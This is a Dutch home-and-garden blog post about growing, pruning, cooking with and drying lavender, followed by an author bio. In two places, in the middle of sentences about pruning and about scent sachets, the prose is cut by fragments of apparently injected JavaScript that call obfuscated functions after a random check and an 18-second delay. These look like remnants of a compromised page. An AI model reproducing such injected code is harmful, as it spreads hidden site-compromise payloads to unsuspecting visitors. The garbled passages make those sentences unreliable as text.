Lavendel in je eigen tuin en keuken!

Lavendel is een heerlijk ruikende, tijdloze struik uit de lipbloemenfamilie, ook wel Lamiaceae. De struik kenmerkt zich voornamelijk door de paarse puntvormige bloemen. Je kunt zoveel leuke dingen met Lavendel doen, zo kun je ze drogen en als decoratie gebruiken of mee koken!

Lavendel in je eigen huis, tuin en keuken

Goed om te weten is dat je Lavendel op meerdere momenten in het jaar kan snoeien. In het voorjaar snoei je hem terug dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot een kleine bol. Het is hierbij belangrijk dat er genoeg groene blaadjes aan het eind van de takken blijven zitten, zo voorkom je kale plekken in struik. Na het snoeien groeien er snel nieuwe twijgen naar boven waar vervolgens weer bloemen aan komen.

Zo aan het eind van de zomer, in augustus/september kun je de Lavendel voor de tweede keer snoeien. Je kunt dan alle dode bloemetjes en bloemstelen weghalen. Maar gooi deze vooral niet weg! Onderstaand wat ideeën over wat je allemaal met Lavendel kunt doen!

Koken met Lavendel

Wist je dat je ook met lavendel kunt koken? Lavendel wordt van oorsprong eigenlijk alleen in de Franse keuken gebruikt en gewaardeerd. Zowel de geur als de smaak zijn beiden vrij overheersend en om deze reden wordt het vaak gebruikt in combinatie met andere kruiden en specerijen. Verder geeft het een prachtige paarse kleur aan gerechten.

Niet alle lavendel zijn als kruiden te gebruiken. Doorgaans kun je dit het beste kopen in een natuurwinkel of bestellen op Internet.

Probeer lavendel eens in desserts of taarten. Je zult versteld staan van het verrassende effect.

Wat ruikt dat lekker!

Lavendel wordt ook vaak gebruikt als geurverspreider. Zo kun je lavendelkorrels in zakjes doen en deze in huis gebruiken. Leg bijvoorbeeld een geurzakje in je kledingkast of op het dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toilet. Zo kun je nog langer van deze geur genieten.

 

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Lavendel in je eigen tuin en keuken!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.